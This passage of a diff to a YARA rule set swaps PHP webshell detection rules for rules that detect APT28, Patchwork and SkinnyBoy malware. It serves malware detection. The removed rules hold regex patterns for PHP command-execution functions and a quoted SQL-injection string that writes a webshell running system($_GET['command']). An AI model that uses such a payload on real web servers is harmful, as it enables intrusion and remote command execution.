-		$o7 = "\\44" wide ascii
-		$o8 = "\\112" wide ascii
-		$o9 = "\\120" wide ascii
-		$fp1 = "$goto" wide ascii
-		$cpayload1 = /\beval[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload2 = /\bexec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload3 = /\bshell_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload4 = /\bpassthru[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload5 = /\bsystem[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload6 = /\bpopen[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload7 = /\bproc_open[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload8 = /\bpcntl_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload9 = /\bassert[\n\t ]{0,500}\([^)0]/ nocase wide ascii
-		$cpayload10 = /\bpreg_replace[\n\t ]{0,500}\([^\)]{1,100}\/[ismxADSUXju]{0,11}(e|\\x65)/ nocase wide ascii
-		$cpayload12 = /\bmb_ereg_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
-		$cpayload13 = /\bmb_eregi_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
-		$cpayload20 = /\bcreate_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload21 = /\bReflectionFunction[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload22 = /fetchall\(PDO::FETCH_FUNC[\n\t ]{0,500}[,}\)]/ nocase wide ascii
-		$m_cpayload_preg_filter1 = /\bpreg_filter[\n\t ]{0,500}(\([^\)]|\/\*)/ nocase wide ascii
-		$m_cpayload_preg_filter2 = "'|.*|e'" nocase wide ascii
+		$x1 = "Micorsoft Corportation" fullword wide
+		$x2 = "IM Monnitor Service" fullword wide
+		$s1 = "imemonsvc.dll" fullword wide
+		$s2 = "iphlpsvc.tmp" fullword
+		$z1 = "urlmon" fullword
+		$z2 = "Registered trademarks and service marks are the property of their respec" wide
+		$z3 = "XpsUnregisterServer" fullword
+		$z4 = "XpsRegisterServer" fullword
+		$z5 = "{53A4988C-F91F-4054-9076-220AC5EC03F3}" fullword
 
 	condition:
-		not ( any of ( $gfp* ) ) and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( not $fp1 and ( ( filesize < 20KB and ( ( #o1 + #o2 ) > 50 or #o3 > 10 or ( #o4 + #o5 + #o6 + #o7 + #o8 + #o9 ) > 20 ) ) or ( filesize < 200KB and ( ( #o1 + #o2 ) > 200 or #o3 > 30 or ( #o4 + #o5 + #o6 + #o7 + #o8 + #o9 ) > 30 ) ) ) ) and ( any of ( $cpayload* ) or all of ( $m_cpayload_preg_filter* ) )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or ( all of ( $s* ) and all of ( $z* ) ) )
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_OBFUSC_Encoded : FILE
+rule SIGNATURE_BASE_Xrat_1 : FILE
 {
 	meta:
-		description = "PHP webshell obfuscated by encoding"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "134c1189-1b41-58d5-af66-beaa4795a704"
-		date = "2021-04-18"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L1141-L1192"
+		description = "Detects Patchwork malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "170c926a-2020-5269-85b8-6fe9ad28ef76"
+		date = "2017-12-11"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/Pg3P4W"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_xrat.yar#L12-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "119fc058c9c5285498a47aa271ac9a27f6ada1bf4d854ccd4b01db993d61fc52"
-		hash = "d5ca3e4505ea122019ea263d6433221030b3f64460d3ce2c7d0d63ed91162175"
-		hash = "8a1e2d72c82f6a846ec066d249bfa0aaf392c65149d39b7b15ba19f9adc3b339"
-		logic_hash = "c2a88e48374f949fcc9c14b773f7709c96b3147d1982ae9721708474ee5a3dcd"
-		score = 70
-		quality = -89
+		logic_hash = "032c5af4f34959783102977543d2caf6199b8d1880a64797882f591e36c64d69"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b"
+		hash2 = "f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a"
 
 	strings:
-		$enc_eval1 = /(e|\\x65|\\101)(\\x76|\\118)(a|\\x61|\\97)(l|\\x6c|\\108)(\(|\\x28|\\40)/ wide ascii nocase
-		$enc_eval2 = /(\\x65|\\101)(v|\\x76|\\118)(a|\\x61|\\97)(l|\\x6c|\\108)(\(|\\x28|\\40)/ wide ascii nocase
-		$enc_assert1 = /(a|\\97|\\x61)(\\115|\\x73)(s|\\115|\\x73)(e|\\101|\\x65)(r|\\114|\\x72)(t|\\116|\\x74)(\(|\\x28|\\40)/ wide ascii nocase
-		$enc_assert2 = /(\\97|\\x61)(s|\\115|\\x73)(s|\\115|\\x73)(e|\\101|\\x65)(r|\\114|\\x72)(t|\\116|\\x74)(\(|\\x28|\\40)/ wide ascii nocase
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
+		$x1 = "\" -CHECK & PING -n 2 127.0.0.1 & EXIT" fullword wide
+		$x2 = "xClient.Core.Elevation" fullword ascii
+		$x3 = ">> Welcome to MAX-Shell :Session created" fullword wide
+		$x4 = "xClient.Properties.Resources.resources" fullword ascii
+		$x5 = "<description>My UAC Compatible application</description>" fullword ascii
+		$s1 = "ping -n 20 localhost > nul" fullword wide
+		$s2 = "DownloadAndExecute" fullword ascii
+		$s3 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36" fullword wide
+		$s4 = "Client.exe" fullword ascii
+		$s5 = "Microsoft -Defender" fullword wide
+		$s6 = "Microsoft- Defender" fullword wide
+		$s7 = "set_RunHidden" fullword ascii
 
 	condition:
-		filesize < 700KB and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and any of ( $enc* )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_OBFUSC_Encoded_Mixed_Dec_And_Hex : FILE
+rule SIGNATURE_BASE_APT28_CHOPSTICK : FILE
 {
 	meta:
-		description = "PHP webshell obfuscated by encoding of mixed hex and dec"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "9ae920e2-17c8-58fd-8566-90d461a54943"
-		date = "2021-04-18"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L1194-L1250"
+		description = "Detects a malware that behaves like CHOPSTICK mentioned in APT28 report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "08bc4cc2-1844-5218-bb89-20a3ac70a951"
+		date = "2015-06-02"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/v3ebal"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt28.yar#L10-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0e21931b16f30b1db90a27eafabccc91abd757fa63594ba8a6ad3f477de1ab1c"
-		hash = "929975272f0f42bf76469ed89ebf37efcbd91c6f8dac1129c7ab061e2564dd06"
-		hash = "88fce6c1b589d600b4295528d3fcac161b581f739095b99cd6c768b7e16e89ff"
-		hash = "883f48ed4e9646da078cabf6b8b4946d9f199660262502650f76450ecf60ddd5"
-		hash = "50389c3b95a9de00220fc554258fda1fef01c62dad849e66c8a92fc749523457"
-		hash = "c4ab4319a77b751a45391aa01cde2d765b095b0e3f6a92b0b8626d5c7e3ad603"
-		hash = "df381f04fca2522e2ecba0f5de3f73a655d1540e1cf865970f5fa3bf52d2b297"
-		hash = "401388d8b97649672d101bf55694dd175375214386253d0b4b8d8d801a89549c"
-		hash = "99fc39a12856cc1a42bb7f90ffc9fe0a5339838b54a63e8f00aa98961c900618"
-		hash = "fb031af7aa459ee88a9ca44013a76f6278ad5846aa20e5add4aeb5fab058d0ee"
-		hash = "dd5d8a9b4bb406e0b8f868165a1714fe54ffb18e621582210f96f6e5ae850b33"
-		hash = "0ff05e6695074f98b0dee6200697a997c509a652f746d2c1c92c0b0a0552ca47"
-		logic_hash = "d9b4d224d43915cf08050c173627b314c3e41a30ecfffe28038281eadc114e51"
-		score = 75
-		quality = -8
+		hash = "f4db2e0881f83f6a2387ecf446fcb4a4c9f99808"
+		logic_hash = "750b2d5157856e0ffd840406eec601ded51ced7ccb20b577f336bbaf32681835"
+		score = 60
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$mix = /['"](\w|\\x?[0-9a-f]{2,3})[\\x0-9a-f]{2,20}\\\d{1,3}[\\x0-9a-f]{2,20}\\x[0-9a-f]{2}\\/ wide ascii nocase
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
+		$s0 = "jhuhugit.tmp" fullword ascii
+		$s8 = "KERNEL32.dll" fullword ascii
+		$s9 = "IsDebuggerPresent" fullword ascii
+		$s10 = "IsProcessorFeaturePresent" fullword ascii
+		$s11 = "TerminateProcess" fullword ascii
+		$s13 = "DeleteFileA" fullword ascii
+		$s15 = "GetProcessHeap" fullword ascii
+		$s16 = "!This program cannot be run in DOS mode." fullword ascii
+		$s17 = "LoadLibraryA" fullword ascii
 
 	condition:
-		filesize < 700KB and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and any of ( $mix* )
+		uint16( 0 ) == 0x5a4d and filesize < 722KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_OBFUSC_Tiny : FILE
+rule SIGNATURE_BASE_APT28_Sourface_Malware1 : FILE
 {
 	meta:
-		description = "PHP webshell obfuscated"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d78e495f-54d2-5f5f-920f-fb6612afbca3"
-		date = "2021-01-12"
-		modified = "2024-03-11"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L1252-L1347"
+		description = "Detects Malware from APT28 incident - SOURFACE is a downloader that obtains a second-stage backdoor from a C2 server."
+		author = "Florian Roth (Nextron Systems)"
+		id = "d4275b8d-384f-58b7-bac5-05fb7db659e2"
+		date = "2015-06-01"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2014/10/apt28-a-window-into-russias-cyber-espionage-operations.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt28.yar#L34-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b7b7aabd518a2f8578d4b1bc9a3af60d155972f1"
-		hash = "694ec6e1c4f34632a9bd7065f73be473"
-		hash = "5c871183444dbb5c8766df6b126bd80c624a63a16cc39e20a0f7b002216b2ba5"
-		logic_hash = "993f1c98362dcbc207c6ceacb116a27d44505dc6dfa1874def780af50422e1b9"
-		score = 75
-		quality = -140
+		logic_hash = "2ec1e5db74b5abe1da0d454b5e901bd808a0be318235f25d713cfdc4aea8d6d7"
+		score = 60
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "e2450dffa675c61aa43077b25b12851a910eeeb6"
+		hash2 = "d9c53adce8c35ec3b1e015ec8011078902e6800b"
 
 	strings:
-		$obf1 = /\w'\.'\w/ wide ascii
-		$obf2 = /\w\"\.\"\w/ wide ascii
-		$obf3 = "].$" wide ascii
-		$gfp1 = "eval(\"return [$serialised_parameter"
-		$gfp2 = "$this->assert(strpos($styles, $"
-		$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
-		$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
-		$gfp5 = "$_POST[partition_by]($_POST["
-		$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
-		$gfp7 = "The above example code can be easily exploited by passing in a string such as"
-		$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
-		$gfp9 = "?p4yl04d=UNION%20SELECT%20'<?%20system($_GET['command']);%20?>',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
-		$gfp10 = "[][}{;|]\\|\\\\[+=]\\|<?=>?"
-		$gfp11 = "(eval (getenv \"EPROLOG\")))"
-		$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
-		$cpayload1 = /\beval[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload2 = /\bexec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload3 = /\bshell_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload4 = /\bpassthru[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload5 = /\bsystem[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload6 = /\bpopen[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload7 = /\bproc_open[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload8 = /\bpcntl_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload9 = /\bassert[\n\t ]{0,500}\([^)0]/ nocase wide ascii
-		$cpayload10 = /\bpreg_replace[\n\t ]{0,500}\([^\)]{1,100}\/[ismxADSUXju]{0,11}(e|\\x65)/ nocase wide ascii
-		$cpayload12 = /\bmb_ereg_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
-		$cpayload13 = /\bmb_eregi_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
-		$cpayload20 = /\bcreate_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload21 = /\bReflectionFunction[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload22 = /fetchall\(PDO::FETCH_FUNC[\n\t ]{0,500}[,}\)]/ nocase wide ascii
-		$m_cpayload_preg_filter1 = /\bpreg_filter[\n\t ]{0,500}(\([^\)]|\/\*)/ nocase wide ascii
-		$m_cpayload_preg_filter2 = "'|.*|e'" nocase wide ascii
+		$s0 = "coreshell.dll" fullword wide
+		$s1 = "Core Shell Runtime Service" fullword wide
+		$s2 = "\\chkdbg.log" wide
 
 	condition:
-		filesize < 500 and not ( any of ( $gfp* ) ) and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( any of ( $cpayload* ) or all of ( $m_cpayload_preg_filter* ) ) and ( ( #obf1 + #obf2 ) > 2 or #obf3 > 10 )
+		uint16( 0 ) == 0x5a4d and filesize < 62KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_OBFUSC_Str_Replace : FILE
+rule SIGNATURE_BASE_APT28_Sourface_Malware2 : FILE
 {
 	meta:
-		description = "PHP webshell which eval()s obfuscated string"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "1f5b93c9-bdeb-52c7-a99a-69869634a574"
-		date = "2021-01-12"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L1349-L1404"
+		description = "Detects Malware from APT28 incident - SOURFACE is a downloader that obtains a second-stage backdoor from a C2 server."
+		author = "Florian Roth (Nextron Systems)"
+		id = "8a9df742-82c1-56bb-ab70-6384403f70b5"
+		date = "2015-06-01"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2014/10/apt28-a-window-into-russias-cyber-espionage-operations.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt28.yar#L52-L72"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "691305753e26884d0f930cda0fe5231c6437de94"
-		hash = "7efd463aeb5bf0120dc5f963b62463211bd9e678"
-		hash = "fb655ddb90892e522ae1aaaf6cd8bde27a7f49ef"
-		hash = "d1863aeca1a479462648d975773f795bb33a7af2"
-		hash = "4d31d94b88e2bbd255cf501e178944425d40ee97"
-		hash = "e1a2af3477d62a58f9e6431f5a4a123fb897ea80"
-		logic_hash = "74fb86a7ee7342ede9f49ef004a92fb7bdf06ca62f8e8f0ea1c6adcff96bcb2d"
-		score = 75
-		quality = 21
+		logic_hash = "ed0424e61ca3243241e32d4f744398d263d7e35de15d94e9c6f816dc7349c267"
+		score = 60
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		super_rule = 1
+		hash0 = "367d40465fd1633c435b966fa9b289188aa444bc"
+		hash1 = "cf3220c867b81949d1ce2b36446642de7894c6dc"
+		hash2 = "ed48ef531d96e8c7360701da1c57e2ff13f12405"
+		hash3 = "682e49efa6d2549147a21993d64291bfa40d815a"
+		hash4 = "a8551397e1f1a2c0148e6eadcb56fa35ee6009ca"
+		hash5 = "f5b3e98c6b5d65807da66d50bd5730d35692174d"
 
 	strings:
-		$payload1 = "str_replace" fullword wide ascii
-		$payload2 = "function" fullword wide ascii
-		$goto = "goto" fullword wide ascii
-		$chr1 = "\\61" wide ascii
-		$chr2 = "\\112" wide ascii
-		$chr3 = "\\120" wide ascii
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
+		$s0 = "coreshell.dll" fullword ascii
+		$s1 = "Applicate" fullword ascii
 
 	condition:
-		filesize < 300KB and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and any of ( $payload* ) and #goto > 1 and ( #chr1 > 10 or #chr2 > 10 or #chr3 > 10 )
+		uint16( 0 ) == 0x5a4d and filesize < 550KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_OBFUSC_Fopo : FILE
+rule SIGNATURE_BASE_APT28_Sourface_Malware3 : FILE
 {
 	meta:
-		description = "PHP webshell which eval()s obfuscated string"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "a298e99d-1ba8-58c8-afb9-fc988ea91e9a"
-		date = "2021-01-12"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L1406-L1466"
+		description = "Detects Malware from APT28 incident - SOURFACE is a downloader that obtains a second-stage backdoor from a C2 server."
+		author = "Florian Roth (Nextron Systems)"
+		id = "b49843b9-3a54-5525-958e-ac545cc00bde"
+		date = "2015-06-01"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2014/10/apt28-a-window-into-russias-cyber-espionage-operations.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt28.yar#L74-L98"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "fbcff8ea5ce04fc91c05384e847f2c316e013207"
-		hash = "6da57ad8be1c587bb5cc8a1413f07d10fb314b72"
-		hash = "a698441f817a9a72908a0d93a34133469f33a7b34972af3e351bdccae0737d99"
-		logic_hash = "076c0c256e5951cdcb2b7bc55030f55bec48c1bea953b8bd85559a3230e387ae"
-		score = 75
-		quality = 15
+		logic_hash = "894fc2913cf1fa8aecb3052e762d4403124fcbdb2148edb23a9117c2f2b8eddc"
+		score = 60
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		super_rule = 1
+		hash0 = "85522190958c82589fa290c0835805f3d9a2f8d6"
+		hash1 = "d9c53adce8c35ec3b1e015ec8011078902e6800b"
+		hash2 = "367d40465fd1633c435b966fa9b289188aa444bc"
+		hash3 = "d87b310aa81ae6254fff27b7d57f76035f544073"
+		hash4 = "cf3220c867b81949d1ce2b36446642de7894c6dc"
+		hash5 = "ed48ef531d96e8c7360701da1c57e2ff13f12405"
+		hash6 = "682e49efa6d2549147a21993d64291bfa40d815a"
+		hash7 = "a8551397e1f1a2c0148e6eadcb56fa35ee6009ca"
+		hash8 = "f5b3e98c6b5d65807da66d50bd5730d35692174d"
+		hash9 = "e2450dffa675c61aa43077b25b12851a910eeeb6"
 
 	strings:
-		$payload = /(\beval[\t ]{0,500}\([^)]|\bassert[\t ]{0,500}\([^)])/ nocase wide ascii
-		$one1 = "7QGV2YWwo" wide ascii
-		$one2 = "tAZXZhbC" wide ascii
-		$one3 = "O0BldmFsK" wide ascii
-		$one4 = "sAQABlAHYAYQBsACgA" wide ascii
-		$one5 = "7AEAAZQB2AGEAbAAoA" wide ascii
-		$one6 = "OwBAAGUAdgBhAGwAKA" wide ascii
-		$two1 = "7QGFzc2VydC" wide ascii
-		$two2 = "tAYXNzZXJ0K" wide ascii
-		$two3 = "O0Bhc3NlcnQo" wide ascii
-		$two4 = "sAQABhAHMAcwBlAHIAdAAoA" wide ascii
-		$two5 = "7AEAAYQBzAHMAZQByAHQAKA" wide ascii
-		$two6 = "OwBAAGEAcwBzAGUAcgB0ACgA" wide ascii
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
+		$s0 = "coreshell.dll" fullword wide
+		$s1 = "Core Shell Runtime Service" fullword wide
 
 	condition:
-		filesize < 3000KB and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and $payload and ( any of ( $one* ) or any of ( $two* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 550KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_Gzinflated : FILE
+rule SIGNATURE_BASE_APT28_Skinnyboy_Dropper_1 : RUSSIA FILE
 {
 	meta:
-		description = "PHP webshell which directly eval()s obfuscated string"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "9cf99ae4-9f7c-502f-9294-b531002953d6"
-		date = "2021-01-12"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L1468-L1541"
+		description = "Detects APT28 SkinnyBoy droppers"
+		author = "Cluster25"
+		id = "ed0b2d2b-f820-57b5-9654-c24734d81996"
+		date = "2021-05-24"
+		modified = "2023-12-05"
+		reference = "https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt28.yar#L103-L118"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "49e5bc75a1ec36beeff4fbaeb16b322b08cf192d"
-		hash = "6f36d201cd32296bad9d5864c7357e8634f365cc"
-		hash = "ab10a1e69f3dfe7c2ad12b2e6c0e66db819c2301"
-		hash = "a6cf337fe11fe646d7eee3d3f09c7cb9643d921d"
-		hash = "07eb6634f28549ebf26583e8b154c6a579b8a733"
-		logic_hash = "d2edb7050c986a00889fd01b709ec0aa1409ce2e40a15b7942562d12596b190e"
+		logic_hash = "9e29ed985fac8701f72f0860fe101272c3c3342ef6857e30d32f5fea14822945"
 		score = 75
-		quality = 7
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		quality = 85
+		tags = "RUSSIA, FILE"
+		hash1 = "12331809c3e03d84498f428a37a28cf6cbb1dafe98c36463593ad12898c588c9"
 
 	strings:
-		$payload2 = /eval\s?\(\s?("\?>".)?gzinflate\s?\(\s?base64_decode\s?\(/ wide ascii nocase
-		$payload4 = /eval\s?\(\s?("\?>".)?gzuncompress\s?\(\s?(base64_decode|gzuncompress)/ wide ascii nocase
-		$payload6 = /eval\s?\(\s?("\?>".)?gzdecode\s?\(\s?base64_decode\s?\(/ wide ascii nocase
-		$payload7 = /eval\s?\(\s?base64_decode\s?\(/ wide ascii nocase
-		$payload8 = /eval\s?\(\s?pack\s?\(/ wide ascii nocase
-		$fp1 = "YXBpLnRlbGVncmFtLm9"
-		$gfp1 = "eval(\"return [$serialised_parameter"
-		$gfp2 = "$this->assert(strpos($styles, $"
-		$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
-		$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
-		$gfp5 = "$_POST[partition_by]($_POST["
-		$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
-		$gfp7 = "The above example code can be easily exploited by passing in a string such as"
-		$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
-		$gfp9 = "?p4yl04d=UNION%20SELECT%20'<?%20system($_GET['command']);%20?>',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
-		$gfp10 = "[][}{;|]\\|\\\\[+=]\\|<?=>?"
-		$gfp11 = "(eval (getenv \"EPROLOG\")))"
-		$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
+		$ = "cmd /c DEL " ascii
+		$ = {8a 08 40 84 c9 75 f9}
+		$ = {0f b7 84 0d fc fe ff ff 66 31 84 0d fc fd ff ff}
 
 	condition:
